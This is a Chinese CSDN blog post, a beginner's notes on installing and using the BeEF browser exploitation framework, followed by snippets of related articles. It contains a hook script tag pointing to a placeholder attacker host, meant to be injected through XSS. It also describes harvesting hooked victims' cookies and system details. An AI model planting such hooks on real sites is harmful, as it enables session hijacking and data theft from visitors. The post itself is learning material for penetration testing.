BeEF新手记录

最新推荐文章于 2024-07-15 02:33:42 发布
最新推荐文章于 2024-07-15 02:33:42 发布
阅读量2.9k 收藏 8
点赞数
分类专栏: 安全 文章标签: web工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laon_chan/article/details/78595682
版权
本文是作者学习BeEF的心得,介绍了BeEF的基本概念、安装过程、使用方法,特别是如何利用BeEF进行XSS漏洞利用和浏览器操控。还探讨了BeEF与Metasploit的结合使用,以及BeEF目录结构的解析,适合初学者了解和入门。
摘要由CSDN通过智能技术生成

BeEf新手向

写在前面

上学期第一次接触到XSS,然后就知道了BeEf这个工具,一直对BeEf很好奇。本文主要是作者作为新手记录学习用的,所以介绍的主要就是BeEf的使用,并没有涉及到底层。新手上路,求轻喷。

BeEF简介

  • 是什么?
    BeEf,The Browser Exploitation Framework缩写,攻击者可以对目标进行攻击测试,攻击成功以后会加载浏览器劫持会话,它扩展了跨站漏洞的利用,能HOOK很多浏览器(IE和Firefox等)并可以执行很多内嵌命令。

环境:BT5 【或者Kali】

安装

删除BT5上面自带的版本稍旧的BeEF【kali上也有自带的beef】

rm -rf /pentest/web/beef-ng

git clone https://github.com/beefproject/beef

cd /pentest/web/beef

./beef

这里写图片描述
然后要开启apache

apache2 start

接着就访问返回信息中的登录地址http://localIP:3000/ui/panel,可以看到一个登录界面,默认账号/密码:beef/beef
网页界面
这里有个小插曲,我在打开http://192.168.137.134:3000/ui/panel的时候,一直没有显示什么登录框,就以为是安装出了错,原来是我的fx设置了安全限制

访问+测试

访问测试网址http://ip:3000//demos/basic.html,就是说,如果一个网站有XSS漏洞,然后你通过某种方式把你的(钓鱼)网址发到这个有XSS漏洞的页面,受害者点击或者直接访问那个界面时,就会跳转到你构造的钓鱼界面
页面源代码要有

<script src="http://攻击主机IP:3000/hook.js"></script>

这里写图片描述
接着我们就可以在我们的beef上看到有受害者登录了
这里写图片描述

各个部分解析

Logs

日志,顾名思义,就是记录所有登录过的肉鸡【访问钓鱼网站的机器】
又有问题了——我想用我的物理机访问BT5上的测试网址,然后发现互ping都可以ping得通,就是访问不了。解决方法就是在NAT模式下,添加一个映射端口,接着就物理机和另一台虚拟机【win 2K3】都可以访问了

Current Browser

Details

可以看到肉鸡的详细信息,包括浏览器信息【版本号等】、访问的页面信息【有cookie!!】以及肉鸡的系统信息

Logs

跟上面那个不一样,这里只是当前肉鸡的操作信息

最低0.47元/天 解锁文章
Oldbowleeeee
关注
专栏目录
【Python刷题篇】——Python入门 04 列表(下)
Python全栈系列
08-19 7112
列表类型是包含0个或多个元素的有序序列,属于序列类型。列表可以进行元素的增加、删除、替换、查找等操作。列表没有长度限制,无素类型可以不同,不需要预定长度。
【在线编程-Python篇】Python入门 04 列表(下)
最新发布
Python全栈系列
08-15 45
列表类型是包含0个或多个元素的有序序列,属于序列类型。列表可以进行元素的增加、删除、替换、查找等操作。列表没有长度限制,无素类型可以不同,不需要预定长度。
BeEF的使用
墨鱼菜鸡
09-17 226
目录 BeEFBeEF-XSS的使用 获取用户Cookie 网页重定向 社工弹窗 钓鱼网站(结合DNS欺骗) BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实...
BEEF的搭建与使用
王意林的专栏
07-17 1万+
安装与搭建 beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
BeEF-XSS在本机制作简易钓鱼网站
dasdasdasvsdV的博客
07-15 451
BeEFBrowser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit(MSF)进行渗透。基于Ruby语言编写,并且支持图形化界面,操作简单。
Web攻防第 03 讲:XSS跨站脚本攻击
分享日常工作技术
12-31 1283
主要基于JS脚本进行恶意攻击行为 一、XSS的危害 XSS利用JS代码实现攻击,有很多种攻击方法,一下简单列出多种 盗取各种用户账号 盗取用户Cookie资料,冒充用户身份进入网站 劫持用户会话,执行任意操作 刷流量,执行弹窗广告 传播蠕虫病毒 二、XSS漏洞的验证方法 我们可以用一段简单的代码来验证和检查漏洞的存在,这样的代码叫POC(Proof of Concept) POC:漏洞的验证与检测 EXP:漏洞的完整利用工具 shellcode:利用漏洞时,所执行的代码 ...
XSS自动化工具——Beef
世间繁华梦一出
03-10 5543
Beef的使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef的使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
BEEF的简介与使用
永远是少年
10-31 2298
今天继续给大家介绍渗透测试相关知识,本文主要内容BEEF的简介与使用。 一、BEEF简介 二、BEEF渗透测试实战
如何解决启动beef失败,提示端口已占用?
jiushiwo15789的博客
05-28 2115
这篇文章主要目的留个自己做个记录新手小白可能遇到的问题,各位大佬可以不用看了O(∩_∩)O~,第一次发文各位表哥表姐轻拍啊。------------------------------我是分割线-----------------------------------------------启动beef,提示端口占用如下图。查看端口及对应pidnetstat -anp|morekill -9 208...
Tool-X 工具汇总
热门推荐
binghuo000的博客
03-12 1万+
Tool-X 工具汇总(更新中......) 本文用于分析Tool-X里面各软件功能用途及特点,以便在需要的时候迅速找到适用的软件! Tool-X是一个由python编写的用于安装kali linux黑客工具的安装程序。在Tool-X的帮助下,你可以在任何Root或非Root的Android设备中安装黑客工具。Tool-X中为我们提供了近262款黑客工具,这些工具可供termux app和GN...
浏览器利用框架BeEF测试
★慕名斋★
11-07 2538
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-25 7462
目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 .
在一个“成员查询”界面上要输入一个人的姓名来查询数据库中的这个人的全部信息并显示在界面上[答疑]
09-09 1万+
我做的一个VB程序,在一个“成员查询”界面上要输入一个人的姓名来查询数据库中的这个人的全部信息并显示在界面上,但是代码不会写啊 ! 我也是刚学VB,也不明白应该怎么弄,帮忙给个详细的代码!谢谢! '〓〓〓〓〓〓〓〓〓〓OpenAccess函数相关定义声明等 Start Publ
beef的简单使用
weixin_44940180的博客
07-23 3547
beef Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行 Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器) Beef一般和
利用BeEF REST API自动化控制僵尸主机
abg49988的博客
06-28 351
本文首发Freebuf,属于原创奖励计划,未经许可禁止转载。 http://www.freebuf.com/articles/network/137662.html 一. 前言   关于BeEF,不再多介绍,它的强大毋庸置疑,利用它我们可以做很多事情。最近的一些实验,需要用beef批量自动进行控制,发现网上也没有过多关于这方面内容的介绍,于是学习了一下它的API,...
Beef安装与简单使用
abg49988的博客
11-06 2068
安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
metasploit加beef插件成功入侵带360win7实测可以漏洞
如鹿渴慕泉水的专栏
05-04 5074
下载beef 解压到 /pentest/web/beef/ cd /pentest/web/beef/ curl -L get.rvm.io | bash -s stable rvm install 1.9.3 rvm use 1.9.3 ##rvm remove 1.9.2 ruby -v gem install bundler bund
BeEf:利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2607
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
Kali Linux下利用Beef攻击浏览器实战详解
"kali-beef攻击浏览器用于运维安全测试,涉及Kali Linux系统、BEEFBrowser Exploitation Framework)工具、钓鱼网站设置以及对浏览器的潜在攻击手段。" Kali Linux是一个基于Debian的Linux发行版,专为网络安全和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值